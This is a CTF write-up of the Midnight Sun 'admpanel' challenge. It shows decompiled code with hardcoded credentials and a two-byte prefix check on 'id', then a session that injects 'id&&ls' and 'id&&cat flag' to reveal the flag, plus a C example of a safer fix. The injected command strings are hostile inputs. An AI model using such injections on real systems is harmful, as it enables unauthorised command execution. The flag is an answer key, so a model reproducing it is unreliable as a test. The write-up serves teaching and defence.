midnightsunctf - admpanel

The Challenge

We found this legacy admin panel. Someone has patched it though :(

This challenge contains a binary which allows the execution of the system command “id” on the host after a successful authentication.

---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1

This challenge has two tasks:

  • finding out the correct credentials for the authentication
  • how to bypass the command restriction

Loading the binary in Ghidra and renaming the functions, we can see that the credentials are hardcoded:

void authentication(void)

{
  int iVar1;
  char local_408 [1024];
  
  printf("  Input username: ");
  fgets(&DAT_004040e0,0x400,stdin);
  iVar1 = strncmp(&DAT_004040e0,"admin",5);
  if (iVar1 == 0) {
    printf("  Input password: ");
    fgets(local_408,0x400,stdin);
    iVar1 = strncmp(local_408,"password",8);
    if (iVar1 == 0) {
      authenticationFlag = 1;
    }
    else {
      logger("AUTHENTICATE",0,0,"Error: Invalid password.");
    }
  }
  else {
    logger("AUTHENTICATE",0,0,"Error: Invalid username.");
  }
  return;
}

Looking further into the binary, we find the following function, which is responsible for issuing system commands on the host:

void execCommand(void)

{
  int iVar1;
  char local_408 [1024];
  
  if (authenticationFlag == 0) {
    logger(&DAT_00402160,0,0,"Error: unauthenticated user tried to execute a command.");
  }
  else {
    printf("  Command to execute: ");
    fgets(local_408,0x400,stdin);
    iVar1 = strncmp(local_408,"id",2);
    if (iVar1 == 0) {
      system(local_408);
    }
    else {
      puts("Any other commands than `id` have been disabled due to security concerns.");
      logger("EXEC_HONEYPOT",(ulong)authenticationFlag,&DAT_004040e0,local_408);
    }
  }
  return;
}

We can see that the function passes our input buffer to system() once the strncmp against "id" succeeds. However, only the first 2 bytes of our input buffer are compared, so any input that starts with "id" passes the check, and the whole buffer is then handed to system().

Knowing this, we can append an arbitrary command to id:
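As an added illustration (this is not the challenge's code; the function names are my own), the following C snippet puts the decompiled prefix check beside a strict allow-list check, and replaces the system() call with a shell-free exec of a fixed argv. The same exact-match helper also covers the strncmp(...,5) / strncmp(...,8) credential checks, which accept any input that merely begins with the expected string.

```c
/* Added example, not the challenge binary's code. Shows why the
 * strncmp prefix checks in authentication()/execCommand() are weak
 * and what a strict check plus a shell-free executor look like. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Mirrors the decompiled check: only the first two bytes must be "id",
 * so "id&&ls\n" or "identify\n" are accepted just like "id\n". */
int weak_command_allowed(const char *input) {
    return strncmp(input, "id", 2) == 0;
}

/* Strict comparison: copy the fgets() buffer, strip the trailing newline,
 * and require the entire string to equal the expected value.
 * Usable for the command allow-list and for the username/password fields. */
int exact_match_after_trim(const char *input, const char *expected) {
    char buf[1024];
    size_t n = strlen(input);
    if (n >= sizeof buf) return 0;          /* refuse oversized input */
    memcpy(buf, input, n + 1);
    buf[strcspn(buf, "\r\n")] = '\0';       /* drop newline left by fgets */
    return strcmp(buf, expected) == 0;
}

int strict_command_allowed(const char *input) {
    return exact_match_after_trim(input, "id");
}

/* Runs the allow-listed command without a shell: a fixed argv is passed
 * to execvp, so user input never reaches /bin/sh. Returns the child's
 * exit status, or -1 on fork/exec failure. */
int run_allowed_command(void) {
    char *const argv[] = { "id", NULL };   /* constant, not user-controlled */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                          /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed input resembling what the writeup typed into the panel. */
    const char *injected = "id&&ls\n";
    printf("weak check on %-10s -> %d\n", "id&&ls", weak_command_allowed(injected));
    printf("strict check on %-8s -> %d\n", "id&&ls", strict_command_allowed(injected));
    if (strict_command_allowed("id\n"))
        printf("running allow-listed command, exit status %d\n", run_allowed_command());
    return 0;
}
```

The strict check fixes the prefix problem, but the more important change is the executor: once a fixed argv is exec'd directly, there is no shell to interpret `&&`, `;` or `|`, so the validation no longer carries the whole security burden.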

---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1
  Input username: admin
  Input password: password
 > 2
  Command to execute: id&&ls
uid=999(ctf) gid=999(ctf) groups=999(ctf)
chall
flag
redir.sh
 > 2
  Command to execute: id&&cat flag
uid=999(ctf) gid=999(ctf) groups=999(ctf)
midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}

About the author

All your $rip belong to us.